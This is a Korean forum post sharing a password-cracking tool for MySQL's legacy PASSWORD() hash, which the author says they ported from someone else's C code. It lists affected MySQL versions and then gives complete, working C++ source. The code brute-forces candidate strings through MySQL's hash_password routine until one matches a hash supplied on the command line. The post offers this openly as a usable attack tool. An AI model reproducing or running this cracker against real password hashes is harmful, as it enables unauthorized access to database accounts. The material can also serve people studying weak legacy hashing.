Database

Mysql Password() 크랙툴

페이지 정보

본문

Mysql Password()함수가 부르트포스 공격으로 인해 크랙 된다는게
좀 오래전에 발표가 된 내용인데요..


Mysql Password() 크랙툴
MFC로 제작하였습니다.

외국넘이 C언어로 만들어 놓은거 MFC로 포팅작업하였습니다.
(찬사는 그 외국넘한테 보내시길...넘~ 넘~ 해서 죄송. 존경의 의미임)

씨퓨 100% 할당하여 크랙을 시작할껍니다. 참고 바랍니다.

빠른 속도를 위해 좀더 업그레이드할 예정. 특정 부분 어셈처리..

6자리까지는 무난히 푸는데.. 그이후로는 상당히 시간이 오래 걸림



/////////////////////////////////////////////////
vulnerable MySQL AB MySQL 3.20 .x
MySQL AB MySQL 3.20.32 a
MySQL AB MySQL 3.21 .x
MySQL AB MySQL 3.22 .x
MySQL AB MySQL 3.22.26
MySQL AB MySQL 3.22.27
MySQL AB MySQL 3.22.28
MySQL AB MySQL 3.22.29
MySQL AB MySQL 3.22.30
MySQL AB MySQL 3.22.32
  + Debian Linux 2.2 68k
  + Debian Linux 2.2 alpha
  + Debian Linux 2.2 arm
  + Debian Linux 2.2 IA-32
  + Debian Linux 2.2 powerpc
  + Debian Linux 2.2 sparc
MySQL AB MySQL 3.23 .x
MySQL AB MySQL 3.23.2
MySQL AB MySQL 3.23.3
  - FreeBSD FreeBSD 4.0
  - FreeBSD FreeBSD 5.0
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.5
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.22
  + RedHat Linux 7.0
  + RedHat Linux 7.0 alpha
  + RedHat Linux 7.0 sparc
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.26
  + RedHat Linux 7.1
  + RedHat Linux 7.1 alpha
  + RedHat Linux 7.1 ia64
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.28 gamma
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.31
  + MandrakeSoft Linux Mandrake 7.2
  + MandrakeSoft Single Network Firewall 7.2
MySQL AB MySQL 3.23.32
  + Wirex Immunix OS 7+
MySQL AB MySQL 3.23.33
  + S.u.S.E. Linux 7.1
  + S.u.S.E. Linux 7.1 alpha
  + S.u.S.E. Linux 7.1 ppc
  + S.u.S.E. Linux 7.1 sparc
  + S.u.S.E. Linux 7.1 x86
MySQL AB MySQL 3.23.34
  - Debian Linux 2.2
  - Debian Linux 2.2 68k
  - Debian Linux 2.2 alpha
  - Debian Linux 2.2 arm
  - Debian Linux 2.2 powerpc
  - Debian Linux 2.2 sparc
  - FreeBSD FreeBSD 3.5.1
  - FreeBSD FreeBSD 4.2
  - HP HP-UX 11.0
  - HP HP-UX 11.11
  - IBM AIX 4.3.2
  - IBM AIX 4.3.3
  - MandrakeSoft Linux Mandrake 7.0
  - MandrakeSoft Linux Mandrake 7.1
  - MandrakeSoft Linux Mandrake 7.2
  - OpenBSD OpenBSD 2.6
  - OpenBSD OpenBSD 2.7
  - OpenBSD OpenBSD 2.8
  - RedHat Linux 5.2 alpha
  - RedHat Linux 5.2 i386
  - RedHat Linux 5.2 sparc
  - RedHat Linux 6.2 alpha
  - RedHat Linux 6.2 i386
  - RedHat Linux 6.2 sparc
  - RedHat Linux 7.0 alpha
  - RedHat Linux 7.0 i386
  - S.u.S.E. Linux 6.4
  - S.u.S.E. Linux 7.0
  - S.u.S.E. Linux 7.1
  - Sun Solaris 2.6
  - Sun Solaris 2.6 _x86
  - Sun Solaris 7.0
  - Sun Solaris 7.0 _x86
  - Sun Solaris 8.0
  - Sun Solaris 8.0 _x86
MySQL AB MySQL 3.23.36
  + Conectiva Linux 6.0
  + Conectiva Linux 7.0
  + EnGarde Secure Linux 1.0.1
  + MandrakeSoft Linux Mandrake 8.0
  + MandrakeSoft Linux Mandrake 8.0 ppc
  + RedHat Linux 7.1
  + RedHat Linux 7.1 i386
  + RedHat Linux 7.1 i586
  + RedHat Linux 7.1 i686
  + RedHat Linux 7.1 ia64
MySQL AB MySQL 3.23.37
  + S.u.S.E. Linux 7.2
  + S.u.S.E. Linux 7.2 i386
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.39
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.41
  + MandrakeSoft Linux Mandrake 8.1
  + MandrakeSoft Linux Mandrake 8.1 ia64
  + RedHat Linux 7.2
  + RedHat Linux 7.2 alpha
  + RedHat Linux 7.2 ia64
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.44
  + S.u.S.E. Linux 7.3
  + S.u.S.E. Linux 7.3 i386
  + S.u.S.E. Linux 7.3 ppc
  + S.u.S.E. Linux 7.3 sparc
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.46
  + Conectiva Linux 8.0
  + OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.47
  + MandrakeSoft Linux Mandrake 8.2
  + MandrakeSoft Linux Mandrake 8.2 ppc
MySQL AB MySQL 3.23.48
  + S.u.S.E. Linux 8.0
  + S.u.S.E. Linux 8.0 i386
MySQL AB MySQL 3.23.49
  + Debian Linux 3.0 alpha
  + Debian Linux 3.0 arm
  + Debian Linux 3.0 hppa
  + Debian Linux 3.0 ia-32
  + Debian Linux 3.0 ia-64
  + Debian Linux 3.0 m68k
  + Debian Linux 3.0 mips
  + Debian Linux 3.0 mipsel
  + Debian Linux 3.0 ppc
  + Debian Linux 3.0 s/390
  + Debian Linux 3.0 sparc
  + RedHat Linux 7.3
  + RedHat Linux 7.3 i386
  + RedHat Linux 7.3 i686
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.52
  + MandrakeSoft Linux Mandrake 9.0
  + OpenPKG OpenPKG 1.1
  + RedHat Linux 8.0
  + RedHat Linux 8.0 i386
  + S.u.S.E. Linux 8.1
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
  + OpenPKG OpenPKG Current
  + Sun Cobalt Qube 3
MySQL AB MySQL 3.23.54 a
  + OpenPKG OpenPKG Current
  + OpenPKG OpenPKG 1.2
  + RedHat Linux 9.0 i386
MySQL AB MySQL 3.23.54
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.55
  + OpenPKG OpenPKG Current
  + Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.56
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.7 -gamma
MySQL AB MySQL 4.0.8 -gamma
MySQL AB MySQL 4.0.9 -gamma
MySQL AB MySQL 4.0.11 -gamma
MySQL AB MySQL 4.1 .0-alpha
MySQL AB MySQL 4.1 .0-0

not vulnerable
 

--------------------------------------------------------------
#include <iostream>
#include <stdio.h>
#include <math.h>
#include <stdlib.h>
#include <string.h> // memset
#include <unistd.h> // usleep

using namespace std;

struct rand_struct {
unsigned long seed1,seed2,max_value;
double max_value_dbl;
};

void make_scrambled_password(char *,const char *);
char *scramble(char *,const char *,const char *, int);

int brute(const char *password) {
// Tune stuff here, change min / max for the char range to crack and width for max password width.
unsigned int min=32,max=122,pos=0,width=11,max_pos=0;
unsigned char data[255];
register unsigned long long loops=0;
char *encrypted_password = new char[255];
memset(encrypted_password, 0, 255);
memset((char*)&data, min, 255);
while(width) {
loops++;
if(data[pos] != max) {
data[pos]++;
} else {
for(register int i=pos; i<max; i++) {
if(data[i] != max) {
data[i]++;
pos=i;
break;
}
}

if(pos>max_pos)
max_pos=pos;

for(register int i=pos-1; i >= 0; i--) {
if(i==0 && data[i] == max) {
data[i] = min;
pos = 0;
break;
}
if(data[i] != max || i==0) {
pos = i;
break;
}
data[i] = min;
}
}

if(max_pos>width) {
cout<<"No match found"<<endl;
width=0;
return(0);
}
data[max_pos+1] = 0;
make_scrambled_password(encrypted_password,(const char*)data);
if(!strcmp(encrypted_password,password)) {
cout<<"MATCH ["<<data<<"] ["<<encrypted_password<<"]==["<<password<<"]"<<endl;
return(0);
}
data[max_pos+1] = min;
if((loops%500000)==0) {
cout<<"[ "<<dec<<loops<<" ]";
for(int i=0; i<=max_pos; i++) {
cout<<" 0x"<<hex<<(int)data[i];
}
data[max_pos+1] = 0;
cout<<" ("<<data<<")";
data[max_pos+1] = min;
cout<<endl;
}
}
}

int main(int argc, char* argv[]) {
if(argc!=2) {
fprintf(stderr,"usage : %s [ENCRYPTED MYSQL PASSWORD]\\nexample , 5d2e19393cc5ef67 is encrypted value 'password' : %s 5d2e19393cc5ef67\\n",argv[0],argv[0]);
return(0);
}
brute(argv[1]);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////
//
// thx mysql source ^_^
//
void randominit(struct rand_struct *rand_st,ulong seed1, ulong seed2) {
rand_st->max_value= 0x3FFFFFFFL;
rand_st->max_value_dbl=(double) rand_st->max_value;
rand_st->seed1=seed1%rand_st->max_value ;
rand_st->seed2=seed2%rand_st->max_value;
}
static void old_randominit(struct rand_struct *rand_st,ulong seed1) {
rand_st->max_value= 0x01FFFFFFL;
rand_st->max_value_dbl=(double) rand_st->max_value;
seed1%=rand_st->max_value;
rand_st->seed1=seed1 ; rand_st->seed2=seed1/2;
}
double rnd(struct rand_struct *rand_st) {
rand_st->seed1=(rand_st->seed1*3+rand_st->seed2) % rand_st->max_value;
rand_st->seed2=(rand_st->seed1+rand_st->seed2+33) % rand_st->max_value;
return(((double) rand_st->seed1)/rand_st->max_value_dbl);
}
inline void hash_password(ulong *result, const char *password) {
register ulong nr=1345345333L, add=7, nr2=0x12345671L;
ulong tmp;
for (; *password ; password++) {
if (*password == ' ' || *password == '\\t')
continue;
tmp= (ulong) (unsigned char) *password;
nr^= (((nr & 63)+add)*tmp)+ (nr << 8);
nr2+=(nr2 << 8) ^ nr;
add+=tmp;
}
result[0]=nr & (((ulong) 1L << 31) -1L); /* Don't use sign bit (str2int) */;
result[1]=nr2 & (((ulong) 1L << 31) -1L);
return;
}
inline void make_scrambled_password(char *to,const char *password) {
ulong hash_res[2];
hash_password(hash_res,password);
sprintf(to,"%08lx%08lx",hash_res[0],hash_res[1]);
}
static inline uint char_val(char X) {
return (uint) (X >= '0' && X <= '9' ? X-'0' : X >= 'A' && X <= 'Z' ? X-'A'+10 : X-'a'+10);
}
char *scramble(char *to,const char *message,const char *password, int old_ver) {
struct rand_struct rand_st;
ulong hash_pass[2],hash_message[2];
if(password && password[0]) {
char *to_start=to;
hash_password(hash_pass,password);
hash_password(hash_message,message);
if (old_ver)
old_randominit(&rand_st,hash_pass[0] ^ hash_message[0]);
else
randominit(&rand_st,hash_pass[0] ^ hash_message[0],
hash_pass[1] ^ hash_message[1]);
while (*message++)
*to++= (char) (floor(rnd(&rand_st)*31)+64);
if (!old_ver) {
char extra=(char) (floor(rnd(&rand_st)*31));
while(to_start != to)
*(to_start++)^=extra;
}
}
*to=0;
return to;
}
 

관련자료

등록된 댓글이 없습니다.
Today's proverb
나는 침묵하는 연습으로 본래의 나로 돌아가고 싶다. 내 안에 설익은 생각을 담아두고 설익은 느낌도 붙잡아두면서 때를 기다려 무르익히는 연습을 하고 싶다. 다 익은 생각이나 느낌일지라도 더욱 지그시 채워두면서 향기로운 포도주로 발효되기를 기다릴 수 있기를 바란다.《그리운 말 한마디》 (유안진)